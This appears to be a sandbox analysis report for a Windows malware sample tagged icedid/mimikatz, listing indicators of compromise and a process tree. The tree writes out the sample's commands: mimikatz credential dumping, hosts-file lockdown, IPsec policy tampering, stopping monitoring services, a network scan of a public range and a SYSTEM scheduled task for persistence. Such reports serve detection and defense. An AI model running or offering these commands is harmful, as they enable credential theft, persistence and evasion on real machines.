Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tbutbbj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tbutbbj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ogmqci.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eztkisrdr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qwttvniyq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4520	cmd.exe
2332	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0009000000023c56-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023c64-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023c64-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 39 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	tbutbbj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	tbutbbj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	tbutbbj.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	tbutbbj.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2332	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4656	schtasks.exe
1112	schtasks.exe
1228	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1696	tbutbbj.exe
Token: SeDebugPrivilege	2452	tbutbbj.exe
Token: SeDebugPrivilege	1292	vfshost.exe
Token: SeDebugPrivilege	5076	ypdiqfiui.exe
Token: SeLockMemoryPrivilege	1572	iakeqk.exe
Token: SeLockMemoryPrivilege	1572	iakeqk.exe
Token: SeDebugPrivilege	2468	ypdiqfiui.exe
Token: SeDebugPrivilege	3312	ypdiqfiui.exe
Token: SeDebugPrivilege	2004	ypdiqfiui.exe
Token: SeDebugPrivilege	2552	ypdiqfiui.exe
Token: SeDebugPrivilege	1504	ypdiqfiui.exe
Token: SeDebugPrivilege	1364	ypdiqfiui.exe
Token: SeDebugPrivilege	2020	ypdiqfiui.exe
Token: SeDebugPrivilege	4908	ypdiqfiui.exe
Token: SeDebugPrivilege	3960	ypdiqfiui.exe
Token: SeDebugPrivilege	1548	ypdiqfiui.exe
Token: SeDebugPrivilege	2576	ypdiqfiui.exe
Token: SeDebugPrivilege	3156	ypdiqfiui.exe
Token: SeDebugPrivilege	3760	ypdiqfiui.exe
Token: SeDebugPrivilege	1864	ypdiqfiui.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
1696	tbutbbj.exe
1696	tbutbbj.exe
2452	tbutbbj.exe
2452	tbutbbj.exe
3996	xohudmc.exe
560	ogmqci.exe
2712	tbutbbj.exe
2712	tbutbbj.exe
4964	tbutbbj.exe
4964	tbutbbj.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3888 wrote to memory of 4520	3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe	84
PID 3888 wrote to memory of 4520	3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe	84
PID 3888 wrote to memory of 4520	3888	2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe	84
PID 4520 wrote to memory of 2332	4520	cmd.exe	86
PID 4520 wrote to memory of 2332	4520	cmd.exe	86
PID 4520 wrote to memory of 2332	4520	cmd.exe	86
PID 4520 wrote to memory of 1696	4520	cmd.exe	87
PID 4520 wrote to memory of 1696	4520	cmd.exe	87
PID 4520 wrote to memory of 1696	4520	cmd.exe	87
PID 2452 wrote to memory of 1228	2452	tbutbbj.exe	89
PID 2452 wrote to memory of 1228	2452	tbutbbj.exe	89
PID 2452 wrote to memory of 1228	2452	tbutbbj.exe	89
PID 1228 wrote to memory of 2868	1228	cmd.exe	91
PID 1228 wrote to memory of 2868	1228	cmd.exe	91
PID 1228 wrote to memory of 2868	1228	cmd.exe	91
PID 1228 wrote to memory of 2480	1228	cmd.exe	92
PID 1228 wrote to memory of 2480	1228	cmd.exe	92
PID 1228 wrote to memory of 2480	1228	cmd.exe	92
PID 1228 wrote to memory of 3604	1228	cmd.exe	93
PID 1228 wrote to memory of 3604	1228	cmd.exe	93
PID 1228 wrote to memory of 3604	1228	cmd.exe	93
PID 1228 wrote to memory of 3156	1228	cmd.exe	94
PID 1228 wrote to memory of 3156	1228	cmd.exe	94
PID 1228 wrote to memory of 3156	1228	cmd.exe	94
PID 1228 wrote to memory of 2140	1228	cmd.exe	95
PID 1228 wrote to memory of 2140	1228	cmd.exe	95
PID 1228 wrote to memory of 2140	1228	cmd.exe	95
PID 1228 wrote to memory of 4668	1228	cmd.exe	96
PID 1228 wrote to memory of 4668	1228	cmd.exe	96
PID 1228 wrote to memory of 4668	1228	cmd.exe	96
PID 2452 wrote to memory of 3480	2452	tbutbbj.exe	97
PID 2452 wrote to memory of 3480	2452	tbutbbj.exe	97
PID 2452 wrote to memory of 3480	2452	tbutbbj.exe	97
PID 2452 wrote to memory of 4880	2452	tbutbbj.exe	99
PID 2452 wrote to memory of 4880	2452	tbutbbj.exe	99
PID 2452 wrote to memory of 4880	2452	tbutbbj.exe	99
PID 2452 wrote to memory of 2240	2452	tbutbbj.exe	101
PID 2452 wrote to memory of 2240	2452	tbutbbj.exe	101
PID 2452 wrote to memory of 2240	2452	tbutbbj.exe	101
PID 2452 wrote to memory of 2184	2452	tbutbbj.exe	103
PID 2452 wrote to memory of 2184	2452	tbutbbj.exe	103
PID 2452 wrote to memory of 2184	2452	tbutbbj.exe	103
PID 2184 wrote to memory of 3436	2184	cmd.exe	105
PID 2184 wrote to memory of 3436	2184	cmd.exe	105
PID 2184 wrote to memory of 3436	2184	cmd.exe	105
PID 3436 wrote to memory of 3520	3436	wpcap.exe	106
PID 3436 wrote to memory of 3520	3436	wpcap.exe	106
PID 3436 wrote to memory of 3520	3436	wpcap.exe	106
PID 3520 wrote to memory of 460	3520	net.exe	108
PID 3520 wrote to memory of 460	3520	net.exe	108
PID 3520 wrote to memory of 460	3520	net.exe	108
PID 3436 wrote to memory of 3576	3436	wpcap.exe	109
PID 3436 wrote to memory of 3576	3436	wpcap.exe	109
PID 3436 wrote to memory of 3576	3436	wpcap.exe	109
PID 3576 wrote to memory of 1592	3576	net.exe	111
PID 3576 wrote to memory of 1592	3576	net.exe	111
PID 3576 wrote to memory of 1592	3576	net.exe	111
PID 3436 wrote to memory of 3232	3436	wpcap.exe	112
PID 3436 wrote to memory of 3232	3436	wpcap.exe	112
PID 3436 wrote to memory of 3232	3436	wpcap.exe	112
PID 3232 wrote to memory of 572	3232	net.exe	114
PID 3232 wrote to memory of 572	3232	net.exe	114
PID 3232 wrote to memory of 572	3232	net.exe	114
PID 3436 wrote to memory of 2772	3436	wpcap.exe	115

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1760
- C:\Windows\TEMP\hnmbtkiin\iakeqk.exe
  "C:\Windows\TEMP\hnmbtkiin\iakeqk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1572

C:\Users\Admin\AppData\Local\Temp\2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-29_104bc394962c7a480e3411854ed43229_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bptuvtrj\tbutbbj.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2332
- - C:\Windows\bptuvtrj\tbutbbj.exe
    C:\Windows\bptuvtrj\tbutbbj.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1696

C:\Windows\bptuvtrj\tbutbbj.exe
C:\Windows\bptuvtrj\tbutbbj.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3604
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2140
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4668
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3480
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4880
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe
    C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3436
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3520
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:460
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1592
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:572
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:2772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2876
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vieiitfbt\tbntqyuzn\Scant.txt
  2⤵
  PID:344
- - C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe
    C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vieiitfbt\tbntqyuzn\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vieiitfbt\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2704
- - C:\Windows\vieiitfbt\Corporate\vfshost.exe
    C:\Windows\vieiitfbt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qjtubdvbc" /ru system /tr "cmd /c C:\Windows\ime\tbutbbj.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2124
